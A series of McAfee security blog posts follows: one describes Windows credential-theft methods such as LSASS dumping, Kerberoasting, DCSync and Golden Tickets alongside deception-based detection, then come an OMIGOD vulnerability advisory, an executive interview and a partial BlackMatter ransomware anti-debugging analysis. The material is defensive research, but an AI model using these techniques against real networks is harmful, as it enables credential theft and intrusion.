Today, enterprises tend to use multiple layers of security defenses, ranging from perimeter defense on network entry points to host based security solutions deployed at the end user’s machines to counter the ever-increasing threats. This includes inline traffic filtering and management security solutions deployed at access and distribution layers in the network, as well as out of band solutions like NAC, SIEM or User Behavior Analysis to provide identity-based network access and gain more visibility into the user’s access to critical network resources. However, layered security defenses face the major and recurring challenge of detecting newer exploitation techniques as they heavily rely on known behaviors. Additionally, yet another significant challenge facing the enterprise network is detecting post-exploitation activities, after perimeter security is compromised.
Post initial compromise, to be able to execute meaningful attacks, attackers would need to steal credentials to move laterally inside the network, access critical network assets and eventually exfiltrate data. They will use several sophisticated techniques to perform internal reconnaissance and remote code execution on critical resources, which range from using legitimate operating system tools to discover network assets to using novel code execution techniques on the target. Consequently, differentiating between the legitimate and malicious use of Windows’ internal tools and services becomes a high priority for enterprise networks.
To tackle this long-standing problem of detecting lateral movement, enterprise networks must formulate active in-network defense strategies to effectively prevent attackers from accessing critical network resources. Network Deception is one such defensive approach which could potentially prove to be an effective solution to detect credential theft attacks. Detecting credential stealing attacks with deception essentially requires building the necessary infrastructure by placing the decoy systems within the same network as production assets and configuring them with decoy contents to lure the attackers towards the decoy machines and services. Accurately configuring and tuning the deceptive network can deflect the attacker’s lateral movement path towards the deceptive services, consequently allowing the attackers to engage with the deceptive network, helping enterprises protect production assets.
MITRE Shield, a knowledge base maintained by MITRE for active defense techniques highlights many of the methods in adversary engagement. Some of the techniques described by MITRE Shield Matrix with respect to network deception are as below:
MITRE Shield | Description | ATT&CK Technique |
Decoy Account – DTE0010 | A decoy account is created for defensive or deceptive purposes. The decoy account can be used to make a system, service, or software look more realistic or to entice an action | Account Discovery, Reconnaissance |
Decoy Credentials – DTE0012 | Seed a target system with credentials (such as username/password, browser tokens, and other forms of authentication data) | Credential Access, Privilege Escalation |
Decoy Diversity – DTE0013 | deployment of decoy systems with varying Operating Systems and software configurations | Reconnaissance |
Decoy Network – DTE0014 | Multiple computing resources that can be used for defensive or deceptive purposes | Initial Access |
Decoy Personna – DTE0015 | Used to establish background information about a user. In order to have the adversary believe they are operating against real targets | Initial Access, Discovery, Reconnaissance |
Decoy System – DTE0017 | Computing resources presented to the adversary in support of active defense | Reconnaissance |
Over the course of this paper, we will discuss some of the widely adapted credential theft attacks executed by adversaries after the initial compromise and then move on to discuss defense techniques against the above MITRE Shield attacks and how to use them effectively to detect deceptive credential usage in the network.
Lateral movement refers to the tools and techniques used by attackers to progressively expand their foothold within an enterprise network after gaining initial access. As shown in the figure below, lateral movement activity comprises of several stages starting from credential theft, target enumeration and discovery, privilege escalation, gaining access to network resources and eventually remote code execution on the target before exfiltrating data to accomplish a successful attack. Once inside the network, attackers will deploy a range of techniques at each stage of lateral movement to achieve their end goal. One of the primary challenges an attacker will face while moving laterally inside a network is to hide their activities in plain sight by generating a minimum volume of legitimate looking logs to be able to remain undetected. To achieve this, an attacker might choose to embed the tool within a malicious executable or use the operating system’s internal legitimate tools and services to perform its lateral movement operations, consequently making this network traffic harder to distinguish.
As per the Verizon DBIR report 2020, over 80% of data breaches involve credential theft attacks. Credential theft is one of the primary tasks attackers need to perform post-exploitation and after gaining initial control of the target machine. It will usually be the first step towards lateral movement strategies which will allow attackers to elevate their privileges and acquire access to other network resources. As indicated earlier, attackers have long been abusing Windows legitimate features like SMB, RPC over SMB, Windows Management Instrumentation, Windows Remote Management, and many other features to perform lateral movement activities. Figure 1 below highlights where lateral movement falls within the attack chain and its different stages. To remain stealthier, these activities would span a period ranging from many weeks to months.
Figure 1 – Stages of Lateral movement
To be able to distinguish between the admissible and malicious use of these inbuilt services, it is extremely critical for organizations to deploy advanced Threat Detection solutions. Over the course of this blog, we will discuss various credential theft techniques used by adversaries during lateral movement. We will also discuss an approach that can be used to effectively detect these techniques inside the network.
Attackers use a variety of tools and techniques to execute credential theft attacks. Many of these tools are open source and readily available on the internet. Operating systems like Windows implement Single Sign On (SSO) functionality, which require the user’s credentials to be stored in memory, thereby allowing the OS to seamlessly access network resource without repeatedly asking the user to re-enter those credentials. Additionally, user credentials are stored in memory in a variety of formats like NTLM hashes, reversibly encrypted plaintext, Kerberos tickets, PINs, etc., which can be used to authenticate to services depending upon the supported authentication mechanism. These credentials can be acquired by attackers from memory by parsing appropriate credential storage structures or using the Windows credential enumeration APIs. Consequently, these attacks pose major security concerns, especially in the domain environment if the attacker gains access to privileged credentials which can then be reused to access critical network resources. In the following sections, we discuss some of the widely adapted credential stealing techniques used by malware, with respect to the Windows operating system. Similar credential stealing techniques can also be used with other operating systems as well.
The Local Security Authority Subsystem Service (LSASS) process manages and stores the credentials of all the users with active Windows sessions. These credentials stored in the LSASS process memory will allow users to access other network resource such as files shares, email servers and other remote services without asking them for the credentials again. LSASS process memory stores the credentials in many formats including reversibly encrypted plaintext, NTLM hashes, Kerberos Tickets (Ticket Granting Tickets, etc.). These credentials are generated and stored in the memory of the LSASS process when a user initiates the interactive logon to the machine such as console logon or RDP, runs a scheduled task or uses remote administration tools. The encryption and decryption of credentials is done using LsaProtectMemory and LsaUnProtectMemory respectively and hence a decryption tool using these APIs will be able to decrypt LSASS memory buffers and extract them. However, malware would need to execute with local administrator privileges and enable “SeDebugPrivilege” on the current process to be able access the LSASS process memory.
Below is a code snapshot from one of the famous credential harvesting tools, Mimikatz, enabling the required privileges on the calling thread before dumping the credentials.
Figure 2 – Checking for required privileges
We can see that the NTLM hash of the user’s credentials is revealed, and this can be brute forced offline as shown below. Many Windows services, such as SMB, support NTLM authentication and NTLM hashes can be used directly for authentication eliminating the need for the clear text passwords.
Figure 3 – Cracking NTLM Hashes offline
Attackers avoid using freely available tools like Mimikatz directly on the target machine to harvest credentials since they are easily detected by AVs. Instead, they use recompiled clones of it with minimal functionality to avoid noise. Below is one such instance where malware embeds recompiled Mimikatz code with the minimal required functionality.
Figure 4 – Credential extraction tool embedded inside malicious executable
Detection can also be avoided by using several “living off the land’ mechanisms, available in many post-exploitation frameworks, to execute the credential harvesting tools directly from memory using Reflective PE injection, where the binary is never written to the disk. Yet another approach is to dump the LSASS process memory using process dumping tools, exfiltrate the dump and extract the credentials offline. Microsoft has documented multiple ways to configure additional LSASS process protection which can prevent credentials being compromised.
The SAM database is a file on a local hard drive that stores the credentials for all local accounts on the Windows computer. NT hashes for all the accounts on the local machine, including the local administrator credential hash, are stored in the SAM database. The SAM database file is in %SystemRoot%system32/config and the hashes of the credentials are within the registry HKLM\SAM. Attackers need to acquire elevated privileges to be able to access the credentials from the SAM database. The example below demonstrates how the credentials from the SAM database can be revealed through a simple Meterpreter session.
Figure 5 – Dumping SAM database
Windows Credential Manager stores the Web and SMB/RDP credentials of users if they choose to save them on the Windows machine, thereby preventing the authentication mechanism from asking for those passwords again on subsequent logins. These credentials are encrypted with Windows Data Protection APIs (DPAPI) CryptProtectData, either using the current user’s logon session or a generated master key, and then saved on the local hard drive. Consequently, any process running in the context of the logged in user will be able to decrypt the credentials using CryptUnProtectData DPAPI. In the domain environment, these credentials can be used by attackers to pivot to other systems in the network. Data Protection APIs provide the cryptographic functionalities that can be used to securely store credentials and keys. These APIs are used by several other Windows components like browsers (IE/Chrome), certificates and many other applications as well. Below is one example of how credential dumping tools like Mimikatz can be used to dump stored Chrome credentials.
Figure 6 – Dumping browser credentials
DPAPI can be abused in multiple ways. In the Active Directory domain joined environment, if other users have logged into the compromised machine, provided a malware is running with escalated privileges, it can extract other user’s master keys from the LSASS memory which can then be used to decrypt their secrets. Below is a screenshot of how the master key can be extracted by using the credential dumping tool.
Figure 7 – Extracting DPAPI Master Key
Malware also tends to use multiple variants of credential enumeration APIs available within Windows. These APIs can extract credentials from Windows Credential Manager. Below is one instance of the malware using CredEnumerateW API to retrieve credentials and then search for terminal services passwords which It would use to pivot to other systems.
Figure 8 – Extracting credentials using Windows API
In the domain joined environment, the Kerberos protocol has a significant role to play with respect to authentication and requesting access to services and applications. It provides Single-Sign-On functionality for accessing multiple shared resources within the enterprise network. The Kerberos authentication mechanism in Active Directory involves multiple requests and responses like Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) supported by a Key Distribution Server (KDC), usually a Domain Controller. Upon successful authentication, a user will be able to access the respective services.
Attackers gaining access to a system joined in the domain would usually look for high value assets like Active Directory Controller, Database server, SharePoint server, Web Server, etc., and these services are registered in the domain with the specific Service Principal Name (SPN) values, which is a unique identifier of the Service Account in the domain. These SPN values are used by Kerberos to map the instance with the logon account allowing the client to authenticate to the respective service. Well known SPN values are listed out here. Once the attacker is authenticated with any domain user credentials and has information about the SPN values of the services within the domain, they can initiate the Kerberos Ticket Granting Service request (TGS – REQ) to the Key Distribution Server with the specified SPN value. Details on how the SPN values are registered and used in Kerberos authentication is documented here. TGS response from the KDC will have the Kerberos Ticket encrypted with the hash of the service account. This ticket can be extracted from the memory and can be brute forced offline to acquire service account credentials, allowing a domain user to gain admin level access to the service.
Kerberoasting is a well-documented attack technique listed in MITRE ATT&CK and it essentially abuses the Kerberos authentication allowing adversaries to request the TGS Tickets for the valid service accounts and brute force the ticket offline to extract the plain text credentials of the service accounts, consequently enabling them to elevate their privileges from domain user to domain admin. As an initial step to this lateral movement technique, the attacker would perform an internal reconnaissance to gain information about the services registered in the domain and get SPN values. A simple PowerShell command after importing the Active Directory PowerShell module, as shown below, can initiate the LDAP query to get information about all the user accounts from the Domain Controller with the SPN value set.
Figure 9 – PowerShell command to generate LDAP query
Attackers can specifically choose to scan the domain for MSSQL service with the registered SPN value used for Kerberos authentication. PowerShell scripts like GetUserSPNs can scan all the user SPNs in the domain or MSSQL service registered in the domain with Discover-PSMSSQLServers or Invoke-Kerberoast scripts. Following is an example output from the script:
Figure 10 – Kerberoasting PowerShell script output
Once an attacker has the SPN value of the SQL service, a Kerberos Ticket Granting Service Ticket request (TGS-REQ) can be initiated to the domain controller with the SPN value. This can be done by a couple of PowerShell commands generating KRB-TGS-REQ as shown below:
Figure 11 – Kerberos TGS request
Consequently, the Domain Controller sends the TGS-RESP with the ticket of the service account which will be cached in the memory and can be extracted by dumping tools like Mimikatz as a .kirbi document. This can be brute forced offline by tgsrespcrack, allowing the attacker to gain unrestricted access to the service with elevated privileges.
As indicted earlier, once an attacker has penetrated the domain network, it will be natural to progress towards targeting critical assets, such as the Active Directory controller. The Active Directory Database Services AD DS Ntds.dit file is one of the most overlooked attack vectors in the domain environment but can have significant impact if the attacker is able to gain the domain administrative rights leading to complete domain compromise.
The Ntds.dit file is the authoritative store of credentials for all the users in the domain joined environment, storing all the information about the users, groups and memberships, including credentials (NT Hashes) of all the users in the domain with historical passwords and user’s DPAPI backup master keys. An Attacker with domain admin rights can gain access to the Domain Controller’s file system and acquire credentials like hashes, Kerberos tickets and other reversibly encrypted passwords of all the users joined in the domain by dumping and exfiltrating the Ntds.dit file. These credentials can then be used by the attacker to further access resources by using attack techniques like PTH within the network since the credentials used across other shared resource could be same.
Multiple techniques can be used to dump the Ntds.dit file from the Domain Controller locally as well as remotely and extract the NTLM hashes/DPAPI backup keys for all the domain joined users. One of the techniques is to use the Volume Shadow Copy Service using the vssadmin command line utility and then extract the Ntds.dit file from the volume shadow copy as shown below.
Figure 12 – Dumping Volume shadow copy for C drive
Sensitive data on Active Directory is encrypted with the Boot Key (Syskey) stored in the SYSTEM registry hive and dumping the SYSTEM registry hive is a prerequisite as well to be able to extract all the credentials.
Publicly available Active Directory auditing frameworks like DSInternals provide PowerShell cmdlets to extract the Syskey from the SYSTEM registry hive and extract all the credentials from the Ntds.dit file.
Ntds.dit can also give access to the powerful service account within the Active Directory Domain, KRBTGT (Key Distribution Centre Service account). Acquiring the NTLM hash of this account can enable the attacker to execute a Golden Ticket attack leading to complete domain compromise with unrestricted access to any service on the domain joined system.
A DCSync attack is a method of credential acquisition which allows an attacker to impersonate the Domain Controller and can consequently replicate all the Active Directory objects to the impersonating client remotely, without requiring the user to logon to the DC or dumping the Ntds.dit file. By impersonating the Domain Controller, the attacker could acquire the NTLM hash of the KRBTGT service account, enabling them to gain access to all the shared resources and applications in the domain joined environment. To be able to execute this credential stealing technique, an attacker would have to compromise the user account with the required permissions, specifically DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, as shown below.
Figure 13 – User with privileges
Once the attacker compromises the user account with the required privileges, Pass-The-Hash attacks can be executed to spawn a command shell with the forged logon session. Credential dumping tools like Mimikatz do this by enumerating all the user logon sessions and replacing the user credentials with the stolen usernames and NTLM hashes provided, in the current logon session. Behind the scenes, this is executed by duplicating the current process’s access token, replacing the user credentials pointed by duplicated access token and subsequently using the modified access token to start a new process with the stolen credentials which will be used for network authentication. This is as shown below for example user “DCPrivUser”.
Figure 14 – Pass-the-Hash attack
Further, as indicated below, any subsequent NTLM authentication from the logon session will use the stolen credentials to authenticate to domain joined systems like the Active Directory Controller.
Attackers can now initiate the AD user objects Replication request to the Domain Controller using Directory Replication Services Remote Protocol (DRSUAPI). DRSUAPI is the RPC protocol used for replication of AD objects. With DCERPC bind request to DRSUAPI, an RPC call to DSGetNCChanges will replicate all the user AD objects to the impersonating client. Attackers would usually target the KRBTGT account since acquiring the NTLM hash of this account will enable them to execute a Golden Ticket attack resulting in unrestricted access to domain services and applications.
Figure 15 – DCSync Attack
As indicated earlier, with the NTLM hash of the KRBTGT account, adversaries can initiate a Golden Ticket attack (Pass-the-Ticket) by injecting the forged Kerberos tickets into the current session which can be used to authenticate to any service with the client that supports pass the ticket (for instance, sqlcmd.exe connection to DB server, PsExec, etc.)
Figure 16 – Golden ticket with forged Kerberos ticket
The credential theft techniques we discussed in the previous sections are just the tip of the iceberg. Adversaries can use many other sophisticated credential stealing techniques to take advantage of system misconfigurations and legitimate administrative tools and protocols and, at the same time, remain undetected for a longer period. With many other event management solutions with SIEMs, used in conjunction with other network security solutions, it becomes a challenge for administrators to distinguish malicious use of legitimate tools and services from lateral movement. Perimeter solutions have their limitations in terms of visibility once the attacker crosses the network boundary and is inside the domain environment. It is extremely critical for organizations to protect and monitor critical network assets like the Domain Controller, Database server, Exchange Servers, build systems and other applications or services, as compromising these systems will result in significant damages. Therefore, enterprise networks must deploy a solution to detect credential stealing attacks as they can be used to pivot to other systems on the network and move laterally once an attacker establishes an attack path to a high value target. If the deployment of a solution within the critical zones of the network can detect the use of stolen credentials before adversaries can reach their target, the critical assets could still be prevented from being compromised.
Network Deception is one such deployment within the domain environment where, using the MITRE Shield techniques like decoy systems and network, decoy credentials, decoy accounts, decoy contents, could potentially help detect lateral movement early in the adversary’s attack path to the target asset and at the same time, report significantly low false detection rates. The idea of deception originates from the decades old honeypot systems but, unlike those, relies more on forging trust and giving adversaries what they are looking for. With its inbuilt proactiveness it is configured to lure attackers towards deceptive systems. As shown in the figure below, Network Deception consists of authentic looking decoy systems placed within the domain network, specifically in the network where the critical assets are placed. These decoy systems (could be virtual machines) are the full-fledged OS with configured applications or services and could be replicating the crucial services like Domain Controller, Exchange or DB server and other decoy machines that could lead to those systems. The image below highlights the key foundational aspects of the Network Deception
Figure 17 – Network Deception
As visualized in the figure above, Network Deception comprises the following key basic facts with respect to the deployment in the domain joined environment:
Since credential theft plays an important role in a successful targeted attack, deception essentially focuses on planting fake credentials on the production and decoy endpoints at multiple places within the OS and monitoring the use of these credentials to pivot to other systems. With respect to the network setup, the following are the key aspects, however this list is not exhaustive, and much more could be added:
Some of the other setup required for effective deployment of deception is as summarized below:
Figure 18 – Deceptive network setup – Basic requirements
To detect the use of deceptive credentials, setting up decoy machines is an essential part of the solution as well. Primarily, decoy machines should enable the access attackers are looking to have during the lateral movement phase. Decoys should also be configured to enable relevant auditing services to be able to generate events. For instance, the following enables the account logon events to be audited:
Decoy machines must be setup to run the log collector agent that can collect the access logs generated and forward them to the correlation server. However, in the domain joined environment, it is also essential to tune the decoy machines to forward only the relevant logs to the correlation server to minimize false positives.
The below highlights some of the auditing required to be enabled on the decoy systems for effective correlation.
Figure 19 – Basic decoy setup
The following sections describe some examples of how deception can be achieved in the domain network, along with a visualization of how credential theft can be detected.
LSASS process memory is one of the prime targets for attackers, as well as malware armed with lateral movement capabilities since it caches a variety of credentials. Credential extraction from the LSASS process requires opening a read handle to the process itself which is closely monitored by EDR products but there are stealthier ways around it.
One of the primary tasks towards achieving credential-based deception is to stage the deceptive credentials in LSASS process memory. This can be accomplished on the production and decoy systems by executing a trivial credential injection code which uses the CreateProcessWithLogonW Windows API with the specified crafted credentials. CreateProcessWithLogonW creates the new logon session using the caller process access token and spawns the process specified as a parameter in the security context of the specified deceptive credentials and it will be staged in the LSASS memory until the process runs in the background. The below shows the example code calling the API with the specified credentials which is also visible when credentials are extracted with Mimikatz.
Figure 20 – Injecting credentials into LSASS memory
One of the parameters to CreateProcessWithLogonW is “dwLogonFlags” which should be specified as LOGON_NETCREDENTIALS_ONLY as shown in the code above. This ensures the specified credentials are used only on the network and not for local logons. Additionally, NETONLY credentials used to create a logon session are not validated by the system. Below is a code snapshot from credential extraction tool Mimikatz, using a similar approach to forge a logon session and replacing the credentials with the supplied ones while executing Pass-the-Hash attacks.
Figure 21 – Mimikatz code for PTH attack
Attackers or malware moving laterally inside the network might do a recon for interesting hostnames via nbtstat/nbtscan. To deflect the lateral movement path, decoy systems can be configured with real looking hostnames that match the production systems. These hostnames will then be visible on NetBIOS scans as shown below.
Figure 22 – Deceptive host names pointing to decoy machines
These decoy systems can also run the relevant client applications pointing to the decoy services, with authentication directed to the decoy Domain Controller in the network. Detection of this attack path happens much earlier, however the decoy network setup keeps the adversaries engaged, helping admins to study their Tools and Techniques.
Figure 23 – Decoy machines running clients pointing to decoy services
A similar deception setup can also be done for the browsers where saved credentials can point to the decoy applications and services within the domain. For instance, Chrome saves the credentials in the SQLite format on the disk which can be decrypted using DPAPI as discussed earlier sections. The below examples demonstrate deceptive browser credentials which can lure adversaries towards the decoy services.
Figure 24 – Inserting deceptive browser credentials
In addition to some of the techniques discussed above, and many others highlighted in the previous sections, setting up deception involves much more advanced configuration of decoy systems to minimize false positives and needs to be tuned to the environment to accurately identify malicious activities. Deception can also be configured to address multiple other phases of lateral movement activity including reconnaissance and target discovery, essentially redirecting the adversaries and giving them a path to the target. Below is a high-level visualization of how the decoy network can look like the domain environment.
Figure 25 – Deception network setup
On the occasion where one of the domain-joined or public facing systems is compromised, authentication would be attempted to other domain joined systems in the network. If an authentication is attempted and any of the decoy systems are accessed and logged on, the use of these planted deceptive credentials should be a red flag and something which must be investigated. The visualization below shows the flow and an event being sent to an administrator on accessing one of the decoy systems.
Figure 26 – Deceptive credentials usage for authentication in the domain
One such example event of successfully logging on to the decoy system is as shown below:
Figure 27 – Alert send to administrator on using deceptive credentials
Credential theft attacks discussed here are mapped by MITRE as below:
Technique ID | Technique Name | Description |
T1003.001 | LSASS Process Memory | Attackers may attempt to access LSASS process memory to extract credentials as it stores a variety of credentials. Administrative privileges are required to access the process memory. |
T1003.002 | SAM Database | Accessing credentials from SAM database requires SYSTEM level privileges. Stores credentials for all the local user accounts on the machine. |
T1003.003 | NTDS.dit file | Contains credentials for all the domain users. File is present on the DC and domain admin privileges are required to access this file. |
T1003.006 | DCSync | Attacker can extract the credentials from the DC by impersonating the domain controller and use DRSUAPI protocol to replicate credentials from DC. |
T1558.001 | Golden Ticket | Attackers acquiring credentials for KRBTGT account can forge the Kerberos ticket called Golden Ticket, allowing them to get unrestricted access to any system in the domain |
T1558.002 | Silver Ticket | Allows attacker to get admin level access to the service accounts by abusing Kerberos authentication |
T1558.003 | Kerberoasting | Allows attackers to extract the Kerberos tickets for service accounts from memory and brute force offline to get credentials |
As credential theft attacks play a significant role in an attacker’s lateral movement, so as in-network defense for the defenders. With attackers’ lateral movement tactics evolving and getting more stealthier, defenders will have to adapt to innovative ways of defending the critical network assets. In–network defense strategies like Deception could prove to be a promising and forward-looking approach towards detecting and mitigating data theft attacks. Strategic planting of decoy systems within the production network, inserting decoy credentials and decoy contents on calculative selection of endpoints and decoy systems and accurately setting up the logging and correlation via SIEMs for monitoring the use of decoy contents, could certainly detect and mitigate the attacks early in the lateral movement life cycle.
Endpoint solutions like User Entity Behavior Analytics (UEBA) and Endpoint Detection and Response (EDR) could also play a significant role in building the deception infrastructure. For instance, one of the ways UEBA solutions could prove useful is to baseline user behavior and monitor access to credential stores on the system. UEBA/EDR could raise the red flag on injection of forged Kerberos tickets in the memory. This can provide user level visibility to a greater extent when integrated with SIEM, playing a crucial role in mitigating credential theft attacks.
The post Detecting Credential Stealing Attacks Through Active In-Network Defense appeared first on McAfee Blog.
This month Microsoft released patches for 86 vulnerabilities. While many of these vulnerabilities are important and should be patched as soon as possible, there is one critical vulnerability that McAfee Enterprise wants to immediately bring to your attention due to the simplicity of what is required to exploit, and evidence that possible exploitation is already being attempted.
The list of flaws, collectively called OMIGOD, impact a software agent called Open Management Infrastructure that’s automatically deployed in many Azure services –
CVE-2021-38647 (CVSS score: 9.8) – Open Management Infrastructure Remote Code Execution Vulnerability
CVE-2021-38648 (CVSS score: 7.8) – Open Management Infrastructure Elevation of Privilege Vulnerability
CVE-2021-38645 (CVSS score: 7.8) – Open Management Infrastructure Elevation of Privilege Vulnerability
CVE-2021-38649 (CVSS score: 7.0) – Open Management Infrastructure Elevation of Privilege Vulnerability
Azure customers on Linux machines, including users of Azure Automation, Azure Automatic Update, Azure Operations Management Suite (OMS), Azure Log Analytics, Azure Configuration Management, and Azure Diagnostics, are at risk of potential exploitation. OMI can also be installed outside of Azure on any on-premises Linux system.
The Remote Code Execution is extremely simple and all that is required is to remove the auth header and root access is available remotely on all machines. With this vulnerability the attackers can obtain initial access to the target Azure environment and then move laterally within it.
Campaign: Multiple CVE’s Affecting the Azure OMI Agent Dubbed OMIGOD
Source: MVISION Insights
Multiple security researchers shared proof of concept attacks on the exploitation of the vulnerabilities and, soon thereafter, actors mimicked the efforts and have recently been seen actively exploiting CVE-2021-38647 via botnet activities.
Background on the Mirai Botnet and related campaigns
Source: MVISION Insights
One such botnet is Mirai, which is actively scanning for vulnerabilities, including those identified as OMIGOD, that will allow the operators to infect a system and spread to connected devices. If the Mirai botnet exploits a vulnerable machine, the operators will drop one of the Mirai DDoS botnet versions and close port 5896 on the internet to prevent other attackers from exploiting the same box. Reports of successful exploitation of OMIGOD have reported cryptominers being deployed on the impacted systems.
Microsoft does not have an auto update mechanism; a manual upgrade of the agents is required to prevent exploitation. Microsoft has released a patched OMI version (1.6.8.1), suggested steps by Microsoft are provided in the below link.
CVE-2021-38647 – Open Management Infrastructure Remote Code Execution Vulnerability
McAfee Enterprise will continue to update the following KB document with product coverage of CVE-2021-38647; please subscribe to the KB to be notified of updates.
McAfee Enterprise coverage for CVE-2021-38647 Remote Code Execution Vulnerability
To identify vulnerable systems in your environment, McAfee Enterprise recommends scanning for systems listening on Ports 5986. Port 5986 is the typical port leveraged by the OMI agent. Industry intelligence from the Wiz Research group is also noting vulnerable systems listening on non–default ports 5985 and 1270. It is recommended to limit network access to those ports immediately to protect from the RCE vulnerability.
MVISION Insights provides regularly updated threat intelligence for the ongoing attempts to exploit OMIGOD. The “Multiple CVE’s Affecting the Azure OMI Agent Dubbed OMIGOD” campaign will have up to date Global Prevalence, IOCs, and MITRE techniques being observed in the wild. The IOCs within MVISION Insights can be utilized by the Real-time Search function of MVISION Endpoint Detection & Response (EDR) to proactively search your entire Linux endpoint environment for detection.
Global Prevalence of OMIGOD Exploitation Source: MVISION Insights
Indicators of Compromise related to exploitation of OMIGOD Source: MVISION Insights
The McAfee ENS Firewall Rules will allow for the creation of custom rules to block specific ports until the OMI agent can be updated to the resolved version; please see the below screenshot for a sample rule to block the ports associated with the OMI agent.
Creation of Block Rule for OMI Agent Ports in McAfee ENS Firewall
The Real-time search feature in MVISION EDR with allow for the searching of your entire Linux environment utilizing several different parameters to identify systems that could be potential targets.
The below pre-built queries can be executed to locate systems listening on the noted ports for the OMI Agent and to verify the version of the OMI agent installed on your endpoint.
Processes and CurrentFlow and HostInfo hostname where Processes name equals omiengine
Software and HostInfo hostname where Software displayname contains om
Locating Installed Software Versions of OMI on Linux endpoints in MVISION EDR
Monitoring the traffic and user information of OMI in MVISION EDR
Another method to identify vulnerable systems in your cloud infrastructure is run an on-demand vulnerability scan and create security configuration audits with MVISION Cloud Native Application Protection Platform (CNAPP). Please see below several examples of using the CWPP and CSPM features to locate vulnerable systems by CVE number and detect usage of the “root” account in Microsoft Azure.
Running Vulnerability Scans to Identify Vulnerable Systems by CVE
Setting Security Configuration Audits to be alerted of Root Access in Microsoft Azure
The post McAfee Enterprise Defender Blog | OMIGOD Vulnerability Opening the Door to Mirai Botnet appeared first on McAfee Blog.
Welcome back to our executive blog series, where I chat with some of the pivotal players behind McAfee Enterprise and the Advanced Threat Research Team to hear their takes on today’s security trends, challenges, and opportunities for companies across the globe.
Q: What got you interested in technology and threat research? |
As a little kid, I was always fascinated by technology. I would wrench open devices to study the inner workings, and try to assemble again. At age 12 I worked for three years to assemble my first computer-setup: a Commodore 64, disk-drive, and printer followed by an Amiga with modem. From that point, it was a journey from sysadmin to ethical hacking into specializing in digital forensics and joining FoundStone to setup their EMEA Incident Response team. As I witnessed multiple malware incidents and later some of the largest cyber-attacks ever, I got fascinated by all the mechanics around threat research. From this, I made a move to lead and envision new ways (threat) research can assist both responders and customers.
Q: If you could relive any moment of your life, which would it be? |
Good question. There are so many moments to be thankful for that I cannot choose one but will mention a few that might sound obvious: My baptism, marrying my wife, and the birth of my kids.
Q: What are some of the trends you are currently noticing across the threat landscape? |
Of course, we still have ransomware around as an ongoing issue that keeps evolving and impacting not only companies around the world, but also our lives more and more when fuel is not available, supermarkets are closed, and delivery of goods cannot be executed. Secondly, I would say the volume and number of attacks that happen have increased dramatically over the years. The moment a vulnerability is announced, within days, a proof-of-concept is available and within a week it is used by adversaries (either cybercrime or nation-state motivated). The feedback from our customers has been tremendously positive.
Q: How do you react to constantly changing threats in the market? |
The only way to respond to the constant changing threats is to be flexible and willing to change. What works today might not work tomorrow, which should be part of your strategy when it comes to threat hunting, threat detection, and protection. My team is eager to learn and we are committed to protect our customers, innovate new research techniques, and adapt that into our technology.
The post Executive Spotlight: Q&A with Lead Scientist & Sr. Principal Engineer, Christiaan Beek appeared first on McAfee Blog.
BlackMatter is a new ransomware threat discovered at the end of July 2021.
This malware started with a strong group of attacks and some advertising from its developers that claims they take the best parts of other malware, such as GandCrab, LockBit and DarkSide, despite also saying they are a new group of developers. We at McAfee Enterprise Advanced Threat Research (ATR), have serious doubts about this last statement as analysis shows the malware has a great deal in common with DarkSide, the malware associated with the Colonial Pipeline attack which caught the attention of the US government and law enforcement agencies around the world.
The main goal of BlackMatter is to encrypt files in the infected computer and demand a ransom for decrypting them. As with previous ransomware, the operators steal files and private information from compromised servers and request an additional ransom to not publish on the internet.
McAfee’s EPP solution covers BlackMatter ransomware with an array of prevention and detection techniques.
ENS ATP provides behavioral content focusing on proactively detecting the threat while also delivering known IoCs for both online and offline detections. For DAT based detections, the family will be reported as Ransom-BlackMatter!<hash>. ENS ATP adds 2 additional layers of protection thanks to JTI rules that provide attack surface reduction for generic ransomware behaviors and RealProtect (static and dynamic) with ML models targeting ransomware threats.
Updates on indicators are pushed through GTI, and customers of Insights will find a threat-profile on this ransomware family that is updated when new and relevant information becomes available.
BlackMatter is typically seen as an EXE program and, in special cases, as a DLL (Dynamic Library) for Windows. Linux machines can be affected with special versions of it too but in this report, we will only be covering the Windows version.
This report will focus on version 1.2 of BlackMatter while also noting the important changes in the current version, 2.0.
BlackMatter is programmed in C++ and has a size of 67Kb.
FIGURE 1. Information about the malware
The compile date of this sample is the 23rd of July 2021. While these dates can be altered, we think it is correct; version 1.9 has a compile time of 12 August 2021 and the latest version, 2.0, has a date four days later, on the 16th of August 2021. Is clear that the malware developers are actively improving the code and making detection and analysis harder.
The first action performed by BlackMatter is preparation of some modules that will be needed later to get the required functions of Windows.
FIGURE 2. BlackMatter searching for functions
BlackMatter uses some tricks to try and make analysis harder and avoid debuggers. Instead of searching for module names it will check for hashes precalculated with a ROT13 algorithm. The modules needed are “kernel32.dll” and “ntdll.dll”. Both modules will try to get functions to reserve memory in the process heap. The APIs are searched using a combination of the PEB (Process Environment Block) of the module and the EAT (Export Table Address) and enumerating all function names. With these names it will calculate the custom hash and check against the target hashes.
FIGURE 3. BlackMatter detecting a debugger
At this point BlackMatter will make a special code to detect debuggers, checking the last 2 “DWORDS” after the memory is reserved, searching for the bytes “0xABABABAB”. These bytes always exist when a process reserves memory in the heap and, if the heap has one special flag (that by default is set when a process is in a debugger), the malware will avoid saving the pointer to the memory reserved so, in this case, the variables will keep a null pointer.
In Windows operating systems the memory has different conditions based on whether a program is running in normal mode (as usual) or in debugging mode (a mode used by programmers, for example). In this case, when the memory is reserved to keep information, if it is in debugging mode, Windows will mark the end of this memory with a special value, “0xABABABAB”. BlackMatter checks for this value and, if found, the debugger is detected. To avoid having it run normally it will destroy the function address that it gets before, meaning it will crash, thus avoiding the execution.
FIGURE 4. Preparing the protection stub function
After this check it will create a special stub in the reserved memory which is very simple but effective in making analysis harder as the stub will need to be executed to see which function is called and executed.
This procedure will be done with all functions that will be needed; the hashes are saved hardcoded in the middle of the “.text” section in little structs as data. The end of each struct will be recognized by a check against the “0xCCCCCCCC” value.
FIGURE 5. Hashes of the functions needed
This behavior highlights that the BlackMatter developers know some tricks to make analysis harder, though it is simple to defeat both by patching the binary.
After this, the ransomware will use another trick to avoid the use of debuggers. BlackMatter will call the function “ZwSetInformationThread” with the class argument of 0x11 which will hide the calling thread from the debuggers.
If the malware executes it correctly and a debugger is attached, the debugging session will finish immediately. This code is executed later in the threads that will be used to encrypt files.
FIGURE 6. Another way to detect a debugger
